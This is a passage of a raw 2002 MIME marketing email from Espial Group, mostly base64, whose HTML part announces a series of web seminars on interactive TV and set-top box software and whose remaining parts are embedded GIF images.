 bC5jb20gYW5kIGluY2x1ZGUgdGhlIHdvcmRzICd1bnN1YnNjcmliZSBURVhUJyAod2l0aG91dCBx
 dW90ZXMpIGluIHRoZSBTVUJKRUNUIExJTkUuDQoNClRvIGdldCB0aGUgdmVyc2lvbiB3aXRoIHBp
 Y3R1cmVzLCBzZW5kIGFuIGVtYWlsIHRvIGZhY2VsaXN0QGVzcGlhbC5jb20gd2l0aCB0aGUgc3Vi
 amVjdCBsaW5lICJTVUJTQ1JJQkUgSFRNTCINCg0KKGMpIDIwMDIsIEVzcGlhbCBHcm91cCBJbmMu
 LCBFc3BpYWwgRXNwcmVzc28sIEVzcGlhbCBFc2NhcGUsIEVzcGlhbCBFYm94LCBFc3BpYWwgQXNz
 aXN0YW50LCBFc3BpYWwgRGV2aWNlVG9wIGFuZCBFc3BpYWwgRGV2aWNlU2VydmVyIGFyZSB0cmFk
 ZW1hcmtzIG9mIEVzcGlhbCBHcm91cC4gQWxsIG90aGVyIHRyYWRlbWFya3MgYmVsb25nIHRvIHRo
 ZWlyIHJlc3BlY3RpdmUgb3duZXJzLiBBbGwgcmlnaHRzIHJlc2VydmVkDQoqKioqDQoNCg0K
 ------=_NextPart_84815C5ABAF209EF376268C8
 Content-Type: text/html; charset=US-ASCII
 Content-Transfer-Encoding: base64
 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv
 L0VOIj4NCjwhLS0gc2F2ZWQgZnJvbSB1cmw9KDAwNDApaHR0cDovL3d3dy5lc3BpYWwuY29tL3N0
 YXRpYy90dl9zZW1pbmFyLyAtLT4NCjxIVE1MPjxIRUFEPjxUSVRMRT46IDogOiBlTmV3cyA6IDog
 OjwvVElUTEU+DQo8TUVUQSBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9aXNvLTg4NTktMSIg
 aHR0cC1lcXVpdj1Db250ZW50LVR5cGU+DQo8U1RZTEUgdHlwZT10ZXh0L2Nzcz4uYm9keSB7DQoJ
 Q09MT1I6ICM2NjY2NjY7IEZPTlQtRkFNSUxZOiAiVmVyZGFuYSIsICJBcmlhbCIsICJIZWx2ZXRp
 Y2EiLCAic2Fucy1zZXJpZiI7IEZPTlQtU0laRTogMTFweDsgTElORS1IRUlHSFQ6IDE2cHgNCn0N
 Ci4uYm9keXNtYWxsIHsNCglDT0xPUjogIzk5OTk5OTsgRk9OVC1GQU1JTFk6ICJWZXJkYW5hIiwg
 IkFyaWFsIiwgIkhlbHZldGljYSIsICJzYW5zLXNlcmlmIjsgRk9OVC1TSVpFOiA5cHg7IExJTkUt
 SEVJR0hUOiAxNnB4DQp9DQouLmJvZHlCT0xEIHsNCglDT0xPUjogIzY2NjY2NjsgRk9OVC1GQU1J
 TFk6ICJWZXJkYW5hIiwgIkFyaWFsIiwgIkhlbHZldGljYSIsICJzYW5zLXNlcmlmIjsgRk9OVC1T
 SVpFOiAxMXB4OyBGT05ULVdFSUdIVDogYm9sZDsgTElORS1IRUlHSFQ6IDE2cHgNCn0NCi4uYm9k
 eXNtYWxsQk9MRCB7DQoJQ09MT1I6ICM2NjY2NjY7IEZPTlQtRkFNSUxZOiAiVmVyZGFuYSIsICJB
 cmlhbCIsICJIZWx2ZXRpY2EiLCAic2Fucy1zZXJpZiI7IEZPTlQtU0laRTogOXB4OyBGT05ULVdF
 SUdIVDogYm9sZDsgTElORS1IRUlHSFQ6IDE2cHgNCn0NCkE6aG92ZXIgew0KCUNPTE9SOiAjMzMz
 MzMzDQp9DQpBOmxpbmsgew0KCUNPTE9SOiAjNjY2NjY2DQp9DQpBOnZpc2l0ZWQgew0KCUNPTE9S
 OiAjY2NjY2NjDQp9DQouLnRpdGxlIHsNCglDT0xPUjogIzMzMzMzMzsgRk9OVC1GQU1JTFk6ICJW
 ZXJkYW5hIiwgIkFyaWFsIiwgIkhlbHZldGljYSIsICJzYW5zLXNlcmlmIjsgRk9OVC1TSVpFOiAx
 NHB4OyBGT05ULVdFSUdIVDogYm9sZDsgTElORS1IRUlHSFQ6IG5vcm1hbA0KfQ0KPC9TVFlMRT4N
 Cg0KPE1FVEEgY29udGVudD0iTVNIVE1MIDUuMDAuMjkxOS42MzA3IiBuYW1lPUdFTkVSQVRPUj48
 L0hFQUQ+DQo8Qk9EWSBiZ0NvbG9yPSNmZmZmZmYgbGVmdE1hcmdpbj0wIA0Kb25sb2FkPSJNTV9w
 cmVsb2FkSW1hZ2VzKCcvdGVtcGxhdGVzL2ltYWdlcy9uYXYvM19vdmVydmlld19vdmVyLmdpZics
 Jy90ZW1wbGF0ZXMvaW1hZ2VzL25hdi8zX2JlbmVmaXRzX292ZXIuZ2lmJywnL3RlbXBsYXRlcy9p
 bWFnZXMvbmF2LzNfaG93X292ZXIuZ2lmJywnL3RlbXBsYXRlcy9pbWFnZXMvbmF2LzNfY2FzZV9v
 dmVyLmdpZicpIiANCnRleHQ9IzAwMDAwMCB0b3BNYXJnaW49MCBtYXJnaW5oZWlnaHQ9IjAiIG1h
 cmdpbndpZHRoPSIwIj4NCjxUQUJMRSBib3JkZXI9MCBjZWxsUGFkZGluZz0wIGNlbGxTcGFjaW5n
 PTAgd2lkdGg9IjEwMCUiPg0KICA8VEJPRFk+DQogIDxUUj4NCiAgICA8VEQgYWxpZ249bWlkZGxl
 IGJhY2tncm91bmQ9Y2lkOjE2ODM5MC0yMjAwMjExMjEyMjM2NDY1MzE1MDUwQGRlc2lnbmVyPg0K
 ICAgICAgPFRBQkxFIGJvcmRlcj0wIGNlbGxQYWRkaW5nPTAgY2VsbFNwYWNpbmc9MCB3aWR0aD02
 MDA+DQogICAgICAgIDxUQk9EWT4NCiAgICAgICAgPFRSPg0KICAgICAgICAgIDxURCB3aWR0aD0x
 NDQ+PElNRyBoZWlnaHQ9NTYgc3JjPSJjaWQ6MjUwMTgxLTIyMDAyMTEyMTIyMzY0NjU0MTUwNTFA
 ZGVzaWduZXIiIA0KICAgICAgICAgICAgd2lkdGg9MTQ0PjwvVEQ+DQogICAgICAgICAgPFREIGFs
 aWduPXJpZ2h0PiZuYnNwOzwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9URD48L1RSPg0KICA8
 VFI+DQogICAgPFREIGJhY2tncm91bmQ9Y2lkOjE5NDU2Mi0yMjAwMjExMjEyMjM2NDY1NDE1MDUy
 QGRlc2lnbmVyPjxJTUcgaGVpZ2h0PTYgDQogICAgICBzcmM9ImNpZDoxNTI5NzMtMjIwMDIxMTIx
 MjIzNjQ2NTQxNTA1M0BkZXNpZ25lciIgd2lkdGg9MT48L1REPjwvVFI+PC9UQk9EWT48L1RBQkxF
 Pg0KPFRBQkxFIGFsaWduPWNlbnRlciBib3JkZXI9MCBjZWxsUGFkZGluZz0wIGNlbGxTcGFjaW5n
 PTAgd2lkdGg9MTAwPg0KICA8VEJPRFk+DQogIDxUUj4NCiAgICA8VEQ+PElNRyBoZWlnaHQ9MjUg
 c3JjPSIiIHdpZHRoPTE+PC9URD48L1RSPjwvVEJPRFk+PC9UQUJMRT4NCjxUQUJMRSBhbGlnbj1j
 ZW50ZXIgYm9yZGVyPTAgY2VsbFBhZGRpbmc9MCBjZWxsU3BhY2luZz0wIHdpZHRoPTYwMD4NCiAg
 PFRCT0RZPg0KICA8VFI+DQogICAgPFREIGJnQ29sb3I9I2ZiZmJmYiB2QWxpZ249dG9wPjxJTUcg
 aGVpZ2h0PTQ0IA0KICAgICAgc3JjPSJjaWQ6MTUzNTMxOS0yMjAwMjExMjEyMjM2NDY1NDE1MDY5
 QGRlc2lnbmVyIiB3aWR0aD01OTU+IDwvVEQ+DQogICAgPFREIGJhY2tncm91bmQ9Y2lkOjg4NzYy
 MC0yMjAwMjExMjEyMjM2NDY1NDE1MDcwQGRlc2lnbmVyIHZBbGlnbj10b3AgDQogICAgICB3aWR0
 aD01PjxJTUcgaGVpZ2h0PTYgc3JjPSJjaWQ6MzAyMzYyMS0yMjAwMjExMjEyMjM2NDY1NDE1MDcx
 QGRlc2lnbmVyIiANCiAgICAgIHdpZHRoPTU+PC9URD48L1RSPg0KICA8VFI+DQogICAgPFREIGFs
 aWduPWxlZnQgYmFja2dyb3VuZD1jaWQ6MTczNzkyMi0yMjAwMjExMjEyMjM2NDY1NDE1MDcyQGRl
 c2lnbmVyIA0KICAgICAgaGVpZ2h0PTY+PElNRyBoZWlnaHQ9NiBzcmM9ImNpZDo5NzgxMjMtMjIw
 MDIxMTIxMjIzNjQ2NTUxNTA3M0BkZXNpZ25lciIgDQogICAgICB3aWR0aD02PjwvVEQ+DQogICAg
 PFREIGhlaWdodD02IHdpZHRoPTU+PElNRyBoZWlnaHQ9NiANCiAgICAgIHNyYz0iY2lkOjI4Nzk1
 MjQtMjIwMDIxMTIxMjIzNjQ2NTUxNTA3NEBkZXNpZ25lciIgDQp3aWR0aD01PjwvVEQ+PC9UUj48
 L1RCT0RZPjwvVEFCTEU+DQo8VEFCTEUgYWxpZ249Y2VudGVyIGJvcmRlcj0wIGNlbGxQYWRkaW5n
 PTAgY2VsbFNwYWNpbmc9MCB3aWR0aD0yMD4NCiAgPFRCT0RZPg0KICA8VFI+DQogICAgPFREPjxJ
 TUcgaGVpZ2h0PTUgc3JjPSJjaWQ6MzYzMjUtMjIwMDIxMTIxMjIzNjQ2NTUxNTA3NUBkZXNpZ25l
 ciIgDQogIHdpZHRoPTE+PC9URD48L1RSPjwvVEJPRFk+PC9UQUJMRT4NCjxUQUJMRSBhbGlnbj1j
 ZW50ZXIgYm9yZGVyPTAgY2VsbFBhZGRpbmc9MCBjZWxsU3BhY2luZz0wIHdpZHRoPTYwMD4NCiAg
 PFRCT0RZPg0KICA8VFI+DQogICAgPFREIGJnQ29sb3I9I2ZiZmJmYiB2QWxpZ249dG9wPg0KICAg
 ICAgPFRBQkxFIGJvcmRlcj0wIGNlbGxQYWRkaW5nPTMwIGNlbGxTcGFjaW5nPTAgd2lkdGg9IjEw
 MCUiPg0KICAgICAgICA8VEJPRFk+DQogICAgICAgIDxUUj4NCiAgICAgICAgICA8VEQgY2xhc3M9
 Ym9keSB2QWxpZ249dG9wPg0KICAgICAgICAgICAgPFRBQkxFIGJvcmRlcj0wIGNlbGxQYWRkaW5n
 PTAgY2VsbFNwYWNpbmc9MCB3aWR0aD0iMTAwJSI+DQogICAgICAgICAgICAgIDxUQk9EWT4NCiAg
 ICAgICAgICAgICAgPFRSPg0KICAgICAgICAgICAgICAgIDxURCB2QWxpZ249dG9wPjxJTUcgaGVp
 Z2h0PTEzMSANCiAgICAgICAgICAgICAgICAgIHNyYz0iY2lkOjI5OTU3MjYtMjIwMDIxMTIxMjIz
 NjQ2NTUxNTA3NkBkZXNpZ25lciIgd2lkdGg9MTAwPjwvVEQ+DQogICAgICAgICAgICAgICAgPFRE
 IGNsYXNzPWJvZHkgdkFsaWduPXRvcD48SU1HIGhlaWdodD0xIA0KICAgICAgICAgICAgICAgICAg
 c3JjPSJjaWQ6MTUxMDI3LTIyMDAyMTEyMTIyMzY0NjU1MTUwNzdAZGVzaWduZXIiIHdpZHRoPTEw
 PjwvVEQ+DQogICAgICAgICAgICAgICAgPFREIGNsYXNzPWJvZHkgdkFsaWduPXRvcD4NCiAgICAg
 ICAgICAgICAgICAgIDxQPjxCUj5HZXQgdGhlIGluZm9ybWF0aW9uIGFuZCBleHBlcnRpc2UgbmVl
 ZGVkIGZvciBpVFYgDQogICAgICAgICAgICAgICAgICBzdWNjZXNzISBFc3BpYWwgaXMgaG9zdGlu
 ZyBhIHNlcmllcyBvZiB3ZWIgc2VtaW5hcnMgYWRkcmVzc2luZyANCiAgICAgICAgICAgICAgICAg
 IFRWIGNoYWxsZW5nZXMgbWFuYWdlcnMgZmFjZSBldmVyeSBkYXkuIDxBIGNsYXNzPWJvZHlCT0xE
 IA0KICAgICAgICAgICAgICAgICAgaHJlZj0iaHR0cDovL3d3dy5lc3BpYWwuY29tL3N0YXRpYy9z
 ZW1pbmFyL3R2X2luZGV4Lmh0bWwiPjxCUj48QlI+PC9BPjxBIA0KICAgICAgICAgICAgICAgICAg
 Y2xhc3M9Ym9keUJPTEQgDQogICAgICAgICAgICAgICAgICBocmVmPSJodHRwOi8vZXNwaWFsZXZl
 bnRzLndlYmV4LmNvbS9lc3BpYWxldmVudHMvb25zdGFnZS9nLnBocD9kPTY2MTY4NjE4OCZhbXA7
 Um5kPTU2ODg0NDUwMCI+U2VtaW5hciANCiAgICAgICAgICAgICAgICAgIDE6IEhUTUwgV2FsbGVk
 IEdhcmRlbiBDb250ZW50PC9BPjxCUj48U1BBTiANCiAgICAgICAgICAgICAgICAgIGNsYXNzPWJv
 ZHlCT0xEPjxCUj48L1NQQU4+VHVlc2RheSBOb3ZlbWJlciAyNiwgMjAwMiwgMTFhbSBFU1QgDQog
 ICAgICAgICAgICAgICAgICAoOGFtIFBTVCwgNHBtIEdNVCk8QlI+PFNQQU4gY2xhc3M9Ym9keUJP
 TEQ+PEJSPjwvU1BBTj5TZXQtVG9wIA0KICAgICAgICAgICAgICAgICAgQm94ZXMsIERWRCBQbGF5
 ZXJzLCBJbnRlZ3JhdGVkIERpZ2l0YWwgVGVsZXZpc2lvbnMgYW5kIA0KICAgICAgICAgICAgICAg
 ICAgUGVyc29uYWwgVmlkZW8gUmVjb3JkZXJzIGRlbWFuZCBmdW5jdGlvbmFsIHVzZXIgaW50ZXJm
 YWNlcyANCiAgICAgICAgICAgICAgICAgIHdpdGggaW50ZXJhY3RpdmUgZmVhdHVyZXMuIEpvaW4g
 dGhpcyB3ZWIgc2VtaW5hciB0byBkaXNjb3ZlciANCiAgICAgICAgICAgICAgICAgIGhvdyB0byBw
 cm90b3R5cGUsIGJ1aWxkIGFuZCBpbXBsZW1lbnQgYSB3YWxsIGdhcmRlbiANCiAgICAgICAgICAg
 ICAgICAgIGVudmlyb25tZW50LjwvUD48L1REPjwvVFI+PC9UQk9EWT48L1RBQkxFPg0KICAgICAg
 ICAgICAgPFA+PFNQQU4gY2xhc3M9Ym9keUJPTEQ+VXBjb21pbmcgU2VtaW5hcnM6IDwvU1BBTj48
 QlI+PEJSPjxBIA0KICAgICAgICAgICAgaHJlZj0iaHR0cDovL2VzcGlhbGV2ZW50cy53ZWJleC5j
 b20vZXNwaWFsZXZlbnRzL29uc3RhZ2UvZy5waHA/ZD02NjI1NTEwMzYmYW1wO1JuZD0xNTI1OTA3
 MTg0Ij5TZW1pbmFyIA0KICAgICAgICAgICAgMiAtIERlc2lnbmluZyBIVE1MIENvbnRlbnQgJmFt
 cDsgQXBwbGljYXRpb25zIGZvciB0aGUgVmlkZW8gDQogICAgICAgICAgICBTdHJlYW08L0E+PEJS
 PjxBIA0KICAgICAgICAgICAgaHJlZj0iaHR0cDovL2VzcGlhbGV2ZW50cy53ZWJleC5jb20vZXNw
 aWFsZXZlbnRzL29uc3RhZ2UvZy5waHA/ZD02Njk1NTE5MTAmYW1wO1JuZD0xNzcxNjQ0MzM5Ij5T
 ZW1pbmFyIA0KICAgICAgICAgICAgMyAtIFNlY3VyaXR5IG9uIGEgU2V0LVRvcCBCb3g8L0E+PEJS
 PjxBIA0KICAgICAgICAgICAgaHJlZj0iaHR0cDovL2VzcGlhbGV2ZW50cy53ZWJleC5jb20vZXNw
 aWFsZXZlbnRzL29uc3RhZ2UvZy5waHA/ZD02NjExODY5MzAmYW1wO1JuZD0xMzg5MTQwMjYiPlNl
 bWluYXIgDQogICAgICAgICAgICA0IC0gTWFraW5nIEludGVybmV0IG9uIFRWIFJlYWxseSBXb3Jr
 PC9BPjxCUj48QSANCiAgICAgICAgICAgIGhyZWY9Imh0dHA6Ly9lc3BpYWxldmVudHMud2ViZXgu
 Y29tL2VzcGlhbGV2ZW50cy9vbnN0YWdlL2cucGhwP2Q9NjY5ODgyMjEyJmFtcDtSbmQ9MTk5Mjkz
 NzA2MiI+U2VtaW5hciANCiAgICAgICAgICAgIDUgLSBDaGVhcCBhbmQgRWFzeSBFbWFpbCBBY2Nl
 c3Mgb24gSW50ZXJhY3RpdmVUVjwvQT48QlI+PEEgDQogICAgICAgICAgICBocmVmPSJodHRwOi8v
 ZXNwaWFsZXZlbnRzLndlYmV4LmNvbS9lc3BpYWxldmVudHMvb25zdGFnZS9nLnBocD9kPTY2MTQ1
 NDgxMSZhbXA7Um5kPTIwOTgzMTgxNTIiPlNlbWluYXIgDQogICAgICAgICAgICA2IC0gSG93IHRv
 IEJ1aWxkIGFuIEVhc3ktdG8tTmF2aWdhdGUsIEN1c3RvbWl6YWJsZSBVc2VyIEludGVyZmFjZSAN
 CiAgICAgICAgICAgIDwvQT48QlI+PEEgDQogICAgICAgICAgICBocmVmPSJodHRwOi8vZXNwaWFs
 ZXZlbnRzLndlYmV4LmNvbS9lc3BpYWxldmVudHMvb25zdGFnZS9nLnBocD9kPTY2MTQzMzg4OCZh
 bXA7Um5kPTQxODk2ODYwMyI+U2VtaW5hciANCiAgICAgICAgICAgIDcgLSBIb3cgdG8gTWlncmF0
 ZSBZb3VyIFNldC1Ub3AgQm94IHRvIE1IUC9PQ0FQPC9BPjxCUj48QSANCiAgICAgICAgICAgIGhy
 ZWY9Imh0dHA6Ly9lc3BpYWxldmVudHMud2ViZXguY29tL2VzcGlhbGV2ZW50cy9vbnN0YWdlL2cu
 cGhwP2Q9NjYxODczNDgxJmFtcDtSbmQ9MTY2NzQ3ODY5NyI+U2VtaW5hciANCiAgICAgICAgICAg
 IDggLSBVbmRlcnN0YW5kaW5nIEphdmEgaW4gdGhlIFRWIFNwYWNlPC9BPjwvUD4NCiAgICAgICAg
 ICAgIDxQPjxBIGNsYXNzPWJvZHlCT0xEIA0KICAgICAgICAgICAgaHJlZj0iaHR0cDovL3d3dy5l
 c3BpYWwuY29tL3N0YXRpYy9zZW1pbmFyL3R2X2luZGV4Lmh0bWwiPlNJR04gVVAgDQogICAgICAg
 ICAgICBUT0RBWSE8L0E+PC9QPg0KICAgICAgICAgICAgPFRBQkxFIGJvcmRlcj0wIGNlbGxQYWRk
 aW5nPTAgY2VsbFNwYWNpbmc9MCB3aWR0aD0iMTAwJSI+DQogICAgICAgICAgICAgIDxUQk9EWT4N
 CiAgICAgICAgICAgICAgPFRSPg0KICAgICAgICAgICAgICAgIDxURCBjbGFzcz1ib2R5IHZBbGln
 bj10b3Agd2lkdGg9IjMzJSI+PFNQQU4gDQogICAgICAgICAgICAgICAgICBjbGFzcz1ib2R5Qk9M
 RD5Ob3J0aCBBbWVyaWNhPC9TUEFOPjxCUj48QSANCiAgICAgICAgICAgICAgICAgIGhyZWY9Im1h
 aWx0bzpzYWxlc0Blc3BpYWwuY29tIj5zYWxlc0Blc3BpYWwuY29tPC9BPiANCiAgICAgICAgICAg
 ICAgICAgIDxCUj4rMS45NzIuOTgwLjcxOTUgPC9URD4NCiAgICAgICAgICAgICAgICA8VEQgY2xh
 c3M9Ym9keSB2QWxpZ249dG9wIHdpZHRoPSIzMyUiPjxTUEFOIA0KICAgICAgICAgICAgICAgICAg
 Y2xhc3M9Ym9keUJPTEQ+RXVyb3BlPC9TUEFOPjxCUj48QSANCiAgICAgICAgICAgICAgICAgIGhy
 ZWY9Im1haWx0bzpzYWxlc2V1cm9wZUBlc3BpYWwuY29tIj5zYWxlc2V1cm9wZUBlc3BpYWwuY29t
 PC9BPiANCiAgICAgICAgICAgICAgICAgIDxCUj4rMDExLjQ0LjE2NjYuNTExNTIxIDwvVEQ+DQog
 ICAgICAgICAgICAgICAgPFREIGNsYXNzPWJvZHkgdkFsaWduPXRvcCB3aWR0aD0iMzMlIj48U1BB
 TiANCiAgICAgICAgICAgICAgICAgIGNsYXNzPWJvZHlCT0xEPkFzaWE8L1NQQU4+PEJSPjxBIA0K
 ICAgICAgICAgICAgICAgICAgaHJlZj0ibWFpbHRvOnNhbGVzYXNpYUBlc3BpYWwuY29tIj5zYWxl
 c2FzaWFAZXNwaWFsLmNvbTwvQT4gDQogICAgICAgICAgICAgICAgICA8QlI+KzAxMS44MS42LjYy
 MjUuMTE2MCA8L1REPjwvVFI+PC9UQk9EWT48L1RBQkxFPg0KICAgICAgICAgICAgPFA+Jm5ic3A7
 PC9QPg0KICAgICAgICAgICAgPEhSIGFsaWduPWNlbnRlciBub1NoYWRlIFNJWkU9MSB3aWR0aD0y
 MDA+DQogICAgICAgICAgICA8U1BBTiBjbGFzcz1ib2R5c21hbGw+V2Ugc2VudCB0aGlzIGFubm91
 bmNlbWVudCB0byB5b3UgYmVjYXVzZSBvZiANCiAgICAgICAgICAgIHlvdXIgcHJldmlvdXMgaW50
 ZXJlc3QgaW4gRXNwaWFsLiBJZiB5b3UnZCByYXRoZXIgbm90IHJlY2VpdmUgdGhlc2UgDQogICAg
 ICAgICAgICB0eXBlcyBvZiBlLW1haWxzIGZyb20gdXMsIHBsZWFzZSBzZW5kIGFuIGVtYWlsIHRv
 IDxBIA0KICAgICAgICAgICAgaHJlZj0ibWFpbHRvOmZhY2VsaXN0QGVzcGlhbC5jb20/c3ViamVj
 dD1SRU1PVkUiPm1haWx0bzpmYWNlbGlzdEBlc3BpYWwuY29tP3N1YmplY3Q9UkVNT1ZFPC9BPiAN
 CiAgICAgICAgICAgIHdpdGggdGhlIFNVQkpFQ1QgTElORSAiUkVNT1ZFIi4gV2UgdmFsdWUgeW91
 ciByaWdodCB0byBwcml2YWN5LiANCiAgICAgICAgICAgIDwvU1BBTj4NCiAgICAgICAgICAgIDxQ
 IGNsYXNzPWJvZHlzbWFsbD4mbmJzcDs8L1A+PC9URD48L1RSPjwvVEJPRFk+PC9UQUJMRT48L1RE
 Pg0KICAgIDxURCBiYWNrZ3JvdW5kPWNpZDoxMzE1OTI4LTIyMDAyMTEyMTIyMzY0NjU1MTUwNzhA
 ZGVzaWduZXIgdkFsaWduPXRvcCANCiAgICAgIHdpZHRoPTU+PElNRyBoZWlnaHQ9NiBzcmM9ImNp
 ZDoyNDgxMTI5LTIyMDAyMTEyMTIyMzY0NjU1MTUwNzlAZGVzaWduZXIiIA0KICAgICAgd2lkdGg9
 NT48L1REPjwvVFI+DQogIDxUUj4NCiAgICA8VEQgYWxpZ249bGVmdCBiYWNrZ3JvdW5kPWNpZDoy
 OTQzMzMwLTIyMDAyMTEyMTIyMzY0NjU1MTUwODBAZGVzaWduZXIgDQogICAgICBoZWlnaHQ9Nj48
 SU1HIGhlaWdodD02IHNyYz0iY2lkOjMwNDUwMzEtMjIwMDIxMTIxMjIzNjQ2NTUxNTA4MUBkZXNp
 Z25lciIgDQogICAgICB3aWR0aD02PjwvVEQ+DQogICAgPFREIGhlaWdodD02IHdpZHRoPTU+PElN
 RyBoZWlnaHQ9NiANCiAgICAgIHNyYz0iY2lkOjI0MjY5MzItMjIwMDIxMTIxMjIzNjQ2NTUxNTA4
 MkBkZXNpZ25lciIgDQp3aWR0aD01PjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+DQo8UD4mbmJz
 cDs8L1A+PC9CT0RZPjwvSFRNTD4NCg0K
 ------=_NextPart_84815C5ABAF209EF376268C8--
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: image/gif; name="pattern_lines.gif"
 Content-Transfer-Encoding: base64
 Content-Description: pattern_lines.gif
 Content-Id: &lt;168390-2200211212236465315050@designer&gt;
 R0lGODlhBQAFAIAAANvb2/n5+SH5BAAAAAAALAAAAAAFAAUAAAIHRH6GodhZAAA7
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: image/gif; name="logo.gif"
 Content-Transfer-Encoding: base64
 Content-Description: logo.gif
 Content-Id: &lt;250181-2200211212236465415051@designer&gt;
 R0lGODlhkAA4ANUAAPaLj/JRV+4mLfioq/7w8frFx+80O/BDSfRuc/V9gfNgZfvFx/3i4/7x8fzT
 1fm2ufeZnfzU1feane1obe3g4O0yOe0kLO0/Rvm3ue3Fxu1NU+2qrPrT1O2cn+23ue11efi2uPJ5
 fvvt7v///+0XH////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACUALAAAAACQADgAAAb/wJJw
 SCwaj8ikcslsOp/QqHRKrVqv2Kx2y+16v+CweEwum89odGZDSbvfzo2lUmnD7/ih5mOZePKAcBMX
 FxUZgYhoFBMaHSUkkJGSk5SVlUOWmZqbnJ2en5lFlAIBB6CamKeqq6ytk6KSCA0jIwymriSpuLu8
 vblEkgojAwkRIw0GuLq+zM2esJDGtwMjAMpCztnaltAktJEHIwvXj9vm293G4CMS5OfvnwbJnN0A
 wwgB1AHu8P2aIwU6dSNBjdYIBLuW+VsYCaBAYJIEHACQYB4/hhi9EXg4hMOCjwsaAAiQAIBJALdW
 KczY7xs9IiECSAC5wKBNBgkEqFrJ8p3L/00DJwlQMGDWMWugeFIyAKFAAQgWKwFwMILAA4SUEDwg
 ISBBgauZDADAWgnBAKcDok76iQoiJwQMaEXQ+QzbpgMEGJhkQCDlJAcEIJh8QICuJGoH4haI68Cw
 pADVKiUgABDCAAIE1DYcwdGuJ3sjEnxSGkkAgYCRChTOejCi1KqiISUYVgky0kklDYcbYIltKLee
 EESuWy4T4mChKT3gzMkeWUhUHUOy7clhJd/cgFsaOtPgPuKb4k4yQHsSNQXNR3yP5JwS9U7WKWG/
 pH28MbkLJKznuIlWgP8AxhcJZIEFIJ0k9uxHgjC3DThcJUOdJKAk81ESFHILoMcKaSSEY/+TTahN
 ogBltDig4SQJTvLeYw+iSIADgtkT4lrMAVWfJAxEcBGEFWZC0nIjnMieeiq2OJ2RkOhD4YwU1tgW
 hx/teJ2ToITjACUpItfgkVt2WF5DTG7WWXGVROkKhyQsp5kn4qFIJIJvstilPVtOKOZLUFK5k2eW
 CMPbKi9imRyODNSG5GwQsBgmJD1KAs0Ac0lSk5SVUPPAPgbApdkDAFh0nqAjQNXhcgpyuVQt8wTA
 V6GVFKAnfakIQEs7Q1JaCQQ2EdAlCQCQSBUBzw2pgKu0AGvJirFQBpgDBwgj5JCvvgKRcMdIMput
 EAK4CUkAKHAgJCkegIC3rJCSwHqlgpOmrrSpFBQnZNiak2VPv2EiQAMJ1BQbVyOsORqf/cxLL6zY
 2EOCcA3GqRLA8Ag8MLvYNIABCeRN3NC64DHk8MORFCHCoA3oeCTG/DFkgF8cO0rEMXTVRBdkJOOZ
 8sxFgJDSbPoRNALKp6A5sz8DGWDUMX+24vPP8ARlAIDf9sww0hhdyMzRUJuTyNVYZ6311lx37fXX
 YIct9thkl2322WinrfbabE8RBAA7
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: image/gif; name="shadow_topbar.gif"
 Content-Transfer-Encoding: base64
 Content-Description: shadow_topbar.gif
 Content-Id: &lt;194562-2200211212236465415052@designer&gt;
 R0lGODlhAQAGAKIAAMHDxc7Q0uDh4vf3+Lm7ve7v7wAAAAAAACH5BAAAAAAALAAAAAABAAYAAAME
 SBBSkwA7
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: image/gif; name="spacer.gif"
 Content-Transfer-Encoding: base64
 Content-Description: spacer.gif
 Content-Id: &lt;152973-2200211212236465415053@designer&gt;
 R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==
 ------=_NextPart_94915C5ABAF209EF376268C8
 Content-Type: image/gif; name="title.gif"
 Content-Transfer-Encoding: base64
 Content-Description: title.gif
 Content-Id: &lt;1535319-2200211212236465415069@designer&gt;
 R0lGODlhUwIsAMQAAMbRs7HAl+Lo2Zuveqm6jaK0hPj59r/LqvH07NTdxuru483Xvdvi0LjGoLK9
 odne0Ozu6PX384KUZpWkfs/WxMXNuXmLW+Lm3J+siqm1lYyccrbEnrzFrW+DT////5SpcSH5BAAA
 AAAALAAAAABTAiwAAAX/4Nd9IjmW6KmabNqubgzPby3b9K3nPO7vvx5wKCwGj0SkMclcOpXQZvQp
 rVKv06y1Rep6v+CweEwum8/otHrNbrvf8Lh8Tq/b7/i8fs/v+/+AgYKDhIWGh4iJimpYW46NkFqR
 j5KVlJeTmZaamJuenaCcop+Ni6anqKmqq6ytrq+wsbKztLW2t7hvo6Gkvby/u8G+wsDDxsXIxMrH
 yyi5z9DR0tPU1dbX2Nna29ynzd/M4cni4OPm5ejk6ufr6c7d8PHy8/T19vf4+fr7bu7+7QDZCfw3
 MCDBgwYTFozBr6HDhxAjSpxIsaLFXAiTBRiQsSMJCwEICJEwYGEOklIG/2hQGIwAR3UFJhQwyfLF
 gAAHA9AcIicAAACIBvw84IWABw86/RBYIEDAggarDhg4KmAMgalJuxT4yZXrhqFffkL9srVpggMl
 yVxFumbA1AWGDnQFQAAOAA8GZvZZcNQDUD0+5+qdsxVA0sJESYgdc9eDmQEHGAhgAGBwHAEeFGhr
 jOjAUQNeAhzNCqcBAwZiPPelmmrAUQVPx4hmG3r16gYKPCDw0uBo4i5rVxtIK2Y26TADFihIatQD
 6kKYbf9tw+BoXTEEEuwufZRBAst3Gq8mLse1B7gfemcm0Xw6GM5kBuS2fdzNVNCtInEmSKEv1BHG
 ZYLZAzUUcBQCGTSQQP8E/9WUgnE7QKjCVg4kcFQCADiwlXUnVHCUBS1AgJcDASwAAVw8SIiDigBQ
 UJc/mEHwk4geSKCFBhjyAF8jDhzVTI8eOPCTA75ckNkIfPn4gWoi2QBkDxZ6kMAEAChwwScYMNCA
 RwzFAR9ZP10H3FDkzXQTCQPMVEB9XZiHgJRdzNZAmF8QQKdWAehVAFQE5LbccY2N9QFxN11302CQ
